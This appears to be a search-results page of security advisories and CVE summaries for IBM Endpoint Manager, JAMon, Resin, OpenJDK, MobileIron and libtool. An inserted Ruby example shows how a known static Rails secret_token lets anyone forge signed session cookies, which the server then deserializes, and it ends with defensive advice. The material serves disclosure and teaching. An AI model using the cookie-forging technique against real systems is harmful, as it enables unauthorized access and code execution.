193 matches found
[RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components. During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager components are based on Ruby on Rails and ship with static secret_token values. With these values,...
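The advisory snippet above stops before explaining why a static Rails secret_token matters. The following is an added example, not code from the advisory, from RedTeam Pentesting or from IBM: it models the Rails 3 CookieStore signing scheme (ActiveSupport::MessageVerifier with its default SHA1 HMAC and Marshal serializer) in plain Ruby stdlib, with a constructed placeholder secret. It shows that whoever knows the secret can mint a session cookie the server accepts as genuine; in a Rails 3 application the server then Marshal-loads that attacker-controlled payload, which is the road from a known secret_token to unauthenticated code execution.

```ruby
require 'openssl'
require 'base64'

# Constructed placeholder: stands in for a shipped, non-random secret_token.
# Not a real product value.
STATIC_SECRET_TOKEN = 'a' * 128

# Sign a session hash the way Rails 3 CookieStore does:
#   base64(Marshal.dump(session)) + "--" + hex(HMAC-SHA1(secret, base64 data))
# Anyone holding the secret can call this, which is exactly what a static
# secret_token hands to an attacker.
def forge_session_cookie(secret, session)
  data = Base64.strict_encode64(Marshal.dump(session))
  digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
  "#{data}--#{digest}"
end

# Constant-time comparison so the check itself does not leak the digest.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack('C*')
  result = 0
  b.each_byte { |byte| result |= byte ^ left.shift }
  result.zero?
end

# Server-side check: returns the session hash when the signature matches the
# secret, nil otherwise. Note that the payload is Marshal-loaded after the
# signature check; with the secret known, the attacker controls that payload.
def verify_session_cookie(secret, cookie)
  data, digest = cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
  return nil unless secure_compare(expected, digest)
  Marshal.load(Base64.strict_decode64(data))
end

if $PROGRAM_NAME == __FILE__
  # With the static secret, a cookie forged off-box verifies like a real one.
  forged = forge_session_cookie(STATIC_SECRET_TOKEN, { 'user_id' => 1, 'admin' => true })
  p verify_session_cookie(STATIC_SECRET_TOKEN, forged)
end
```

The defensive takeaway is the same for any HMAC-based session scheme: the secret must be generated per installation (Rails does this with `rake secret`), never committed to the product image, and rotated if it ever leaks, because the signature check is only as strong as the secret's confidentiality.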
Google Releases Open Source XSS Web App Scanner
UPDATE: A previous version of this story incorrectly reported that Firing Range is a scanner; in reality Firing Range is a tool that tests Web application security scanners. Google today released an open source tool called Firing Range, which is designed as a test bed for Web application...
MGASA-2014-0422 Updated java-1.7.0-openjdk packages fix security vulnerabilities
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions (CVE-2014-6506, CVE-2014-6531, CVE-2014-6502, CVE-2014-6511, CVE-2014-6504, CVE-2014-6519). It was...
MobileIron Virtual Smartphone Platform Privilege Escalation Exploit
MobileIron Virtual Smartphone Platform Privilege Escalation Exploit (0day). The MobileIron Virtual Smartphone Platform is the first solution to combine data-driven smartphone and tablet...
CVE-2014-3133
SAP Netweaver Java Application Server does not properly restrict access, which allows remote attackers to obtain the list of SAP systems registered on an SLD via an unspecified webdynpro, related to SystemSelection...
CVE-2013-6235
Multiple cross-site scripting (XSS) vulnerabilities in JAMon (Java Application Monitor) 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) listenertype or (2) currentlistener parameter to mondetail.jsp, or the ArraySQL parameter to (3) mondetail.jsp, (4) jamonadmin.jsp, (5)...
CVE-2013-6235
CVE-2013-6235 refers to multiple reflected XSS vulnerabilities in JAMon (Java Application Monitor) v2.7 and earlier. The flaw allows remote attackers to inject arbitrary script/HTML via unsanitized input in parameters such as listenertype and currentlistener (in mondetail.jsp) and ArraySQL (in mo...
JAMon 2.7 Cross Site Scripting
Advisory Information Title: Multiple Reflected XSS vulnerabilities in JAMon Date published: 2013-01-23 Date of last update: 2013-01-23 Vendors contacted: JAMon v 2.7 Discovered by: Christian Catalano Severity: Low 02. Vulnerability Information CVE reference: CVE-2013-6235 CVSS v2 Base Score:...
Oracle Linux 5 : gcc / and / gcc4 (ELSA-2010-0039)
The remote Oracle Linux 5 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2010-0039 advisory. Changelog 4.1.2-46.el5_4.2: fix libjava to avoid opening .la / dlopening .so files from the current working directory or subdirectories thereof (bug 545672, CVE-2009-3736). Tenable ha...
Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130703)
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. CVE-2013-2470, CVE-2013-2471, CVE-2013-247...
Resin Application Server 4.0.36 XSS / Source Code Disclosure
Resin Application Server version 4.0.36 suffers from cross site scripting and source code disclosure vulnerabilities. Resin Application Server 4.0.36 Cross-Site Scripting Vulnerabilities. Vendor: Caucho Technology, Inc. Product web page: http://www.caucho.com Affected version: Resin Professional...
MobileIron Virtual Smartphone Platform - Privilege Escalation
MobileIron Virtual Smartphone Platform Privilege Escalation Exploit (0day). The MobileIron Virtual Smartphone Platform is the first solution to combine data-driven smartphone and tablet management with real-time wireless cost...
Resin Application Server 4.0.36 Source Code Disclosure
Resin Application Server 4.0.36 Source Code Disclosure Vulnerability Vendor: Caucho Technology, Inc. Product web page: http://www.caucho.com Affected version: Resin Professional Web And Application Server 4.0.36 Summary: Resin is the Java Application Server for high traffic sites that require spe...
CentOS Update for java CESA-2013:0770 centos5
The remote host is missing an update for java as announced via the CESA-2013:0770 advisory. Some text descriptions might be excerpted from referenced sources and are copyright of the respective right holders (Greenbone AG, 2013; GPL-2.0-only)...
Eucalyptus Cloud Controller Console Detection
The web console for Eucalyptus Cloud Controller, a Java application that implements an interface compatible with Amazon's EC2, was found on the remote host. (Tenable Network Security, Inc.; Nessus plugin 61610, version 1.3, last updated 2019/11/25)...
Scientific Linux Security Update : gcc and gcc4 on SL3.x, SL4.x, SL5.x i386/x86_64
CVE-2009-3736 (libtool: libltdl may load and execute code from a library in the current directory). A flaw was found in the way GNU Libtool's libltdl library looked for libraries to load. It was possible for libltdl to load a malicious library from the current working directory. In certain...